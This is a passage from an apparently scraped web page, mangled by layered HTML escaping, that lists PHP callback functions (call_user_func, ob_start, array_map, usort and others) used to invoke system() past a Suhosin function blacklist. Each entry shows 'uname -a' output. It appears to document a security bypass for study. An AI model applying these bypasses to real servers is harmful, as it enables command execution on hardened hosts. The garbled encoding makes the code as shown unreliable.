\n echo &amp;amp;amp;amp;quot;call_user_func (PHP4, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n call_user_func(‘system’, $cmd);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/php]<\/p>\n
\ncall_user_func (PHP4, PHP5):&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\nLinux 2.6.38-16-generic-pae #67-Ubuntu SMP Thu Sep 6 18:18:02 UTC 2012 i686 GNU\/Linux[\/bash]<\/p>\ncall_user_func_array (PHP4 >= 4.0.4, PHP5)<\/h3>\n
\n
\n&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $cmd = &amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;suhosin.executor.func.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.func.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;call_user_func_array (PHP4 &amp;amp;amp;amp;gt;= 4.0.4, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n call_user_func_array(‘system’, array($cmd));&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/php]<\/p>\n
\ncall_user_func_array (PHP4 &amp;amp;amp;amp;gt;= 4.0.4, PHP5):&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\nLinux 2.6.38-16-generic-pae #67-Ubuntu SMP Thu Sep 6 18:18:02 UTC 2012 i686 GNU\/Linux[\/bash]<\/p>\nob_start (PHP4, PHP5)<\/h3>\n
\n
\n&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $cmd = &amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;suhosin.executor.func.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.func.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;ob_start (PHP4, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n ob_start(‘system’);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo $cmd;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n ob_end_flush();&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/php]<\/p>\n
\nob_start (PHP4, PHP5):&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\nLinux 2.6.38-16-generic-pae #67-Ubuntu SMP Thu Sep 6 18:18:02 UTC 2012 i686 GNU\/Linux[\/bash]<\/p>\nReflectionFunction (PHP5)<\/h3>\n
\n
\n&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $cmd = &amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;suhosin.executor.func.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.func.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;ReflectionFunction (PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $function = new ReflectionFunction(‘system’);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $function-&amp;amp;amp;amp;gt;invoke($cmd);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/php]<\/p>\n
\nReflectionFunction (PHP5):&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\nLinux 2.6.38-16-generic-pae #67-Ubuntu SMP Thu Sep 6 18:18:02 UTC 2012 i686 GNU\/Linux[\/bash]<\/p>\niterator_apply (PHP5 >= 5.1.0)<\/h3>\n
\n
\n&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $cmd = &amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;suhosin.executor.func.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.func.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;iterator_apply (PHP5 &amp;amp;amp;amp;gt;= 5.1.0):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n iterator_apply(new ArrayIterator(array(&amp;amp;amp;amp;quot;&amp;amp;amp;amp;quot;)), &amp;amp;amp;amp;quot;system&amp;amp;amp;amp;quot;, array($cmd));&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/php]<\/p>\n
\niterator_apply (PHP5 &amp;amp;amp;amp;gt;= 5.1.0):&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\nLinux 2.6.38-16-generic-pae #67-Ubuntu SMP Thu Sep 6 18:18:02 UTC 2012 i686 GNU\/Linux[\/bash]<\/p>\nregister_tick_function (PHP4 >= 4.0.3, PHP5)<\/h3>\n
\n
\n&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $cmd = &amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;suhosin.executor.func.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.func.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;register_tick_function (PHP4 &amp;amp;amp;amp;gt;= 4.0.3, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n declare(ticks=1);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n register_tick_function(‘system’, $cmd);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n unregister_tick_function(‘system’);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/php]<\/p>\n
\nregister_tick_function (PHP4 &amp;amp;amp;amp;gt;= 4.0.3, PHP5):&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\nLinux 2.6.38-16-generic-pae #67-Ubuntu SMP Thu Sep 6 18:18:02 UTC 2012 i686 GNU\/Linux[\/bash]<\/p>\narray_map (PHP4 >= 4.0.6, PHP5)<\/h3>\n
\n
\n&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $cmd = &amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;suhosin.executor.func.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.func.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;array_map (PHP4 &amp;amp;amp;amp;gt;= 4.0.6, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n array_map(‘system’, array($cmd));&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/php]<\/p>\n
\narray_map (PHP4 &amp;amp;amp;amp;gt;= 4.0.6, PHP5):&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\nLinux 2.6.38-16-generic-pae #67-Ubuntu SMP Thu Sep 6 18:18:02 UTC 2012 i686 GNU\/Linux[\/bash]<\/p>\narray_walk (PHP4, PHP5)<\/h3>\n
\n
\n&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $cmd = &amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;suhosin.executor.func.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.func.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;array_walk (PHP4, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $x = array($cmd);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n array_walk($x, ‘system’);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/php]<\/p>\n
\narray_walk (PHP4, PHP5):&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\nLinux 2.6.38-16-generic-pae #67-Ubuntu SMP Thu Sep 6 18:18:02 UTC 2012 i686 GNU\/Linux[\/bash]<\/p>\narray_filter (PHP4 >= 4.0.6, PHP5)<\/h3>\n
\n
\n&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $cmd = &amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;suhosin.executor.func.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.func.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;array_filter (PHP4 &amp;amp;amp;amp;gt;= 4.0.6, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n array_filter(array($cmd), ‘system’);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/php]<\/p>\n
\narray_filter (PHP4 &amp;amp;amp;amp;gt;= 4.0.6, PHP5):&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\nLinux 2.6.38-16-generic-pae #67-Ubuntu SMP Thu Sep 6 18:18:02 UTC 2012 i686 GNU\/Linux[\/bash]<\/p>\nusort (PHP4, PHP5)<\/h3>\n
\n
\n&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $cmd = &amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;suhosin.executor.func.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.func.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;usort (PHP4, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $x = array(&amp;amp;amp;amp;quot;&amp;amp;amp;amp;quot;, $cmd);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n usort($x, ‘system’);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/php]<\/p>\n
\nusort (PHP4, PHP5):&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\nLinux 2.6.38-16-generic-pae #67-Ubuntu SMP Thu Sep 6 18:18:02 UTC 2012 i686 GNU\/Linux[\/bash]<\/p>\nuasort (PHP4, PHP5)<\/h3>\n
\n
\n&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $cmd = &amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;suhosin.executor.func.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.func.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;uasort (PHP4, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $x = array(&amp;amp;amp;amp;quot;&amp;amp;amp;amp;quot;, $cmd);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n uasort($x, ‘system’);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/php]<\/p>\n
\nuasort (PHP4, PHP5):&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\nLinux 2.6.38-16-generic-pae #67-Ubuntu SMP Thu Sep 6 18:18:02 UTC 2012 i686 GNU\/Linux[\/bash]<\/p>\narray_udiff (PHP5)<\/h3>\n
\n
\n&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $cmd = &amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;suhosin.executor.func.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.func.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;array_udiff (PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n array_udiff(array($cmd), array(&amp;amp;amp;amp;quot;&amp;amp;amp;amp;quot;), ‘system’);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/php]<\/p>\n
\narray_udiff (PHP5):&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\nLinux 2.6.38-16-generic-pae #67-Ubuntu SMP Thu Sep 6 18:18:02 UTC 2012 i686 GNU\/Linux[\/bash]<\/p>\narray_reduce (PHP4 >= 4.0.5, PHP5)<\/h3>\n
\n
\n&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $cmd = &amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;suhosin.executor.func.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.func.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;array_reduce (PHP4 &amp;amp;amp;amp;gt;= 4.0.5, PHP5):&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n array_reduce(array(&amp;amp;amp;amp;quot;&amp;amp;amp;amp;quot;), ‘system’, $cmd);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n[\/php]<\/p>\n
\narray_reduce (PHP4 &amp;amp;amp;amp;gt;= 4.0.5, PHP5):&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\nLinux 2.6.38-16-generic-pae #67-Ubuntu SMP Thu Sep 6 18:18:02 UTC 2012 i686 GNU\/Linux[\/bash]<\/p>\narray_uintersect_assoc\u00a0(PHP5)<\/h3>\n
\n
\n&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $cmd = &amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
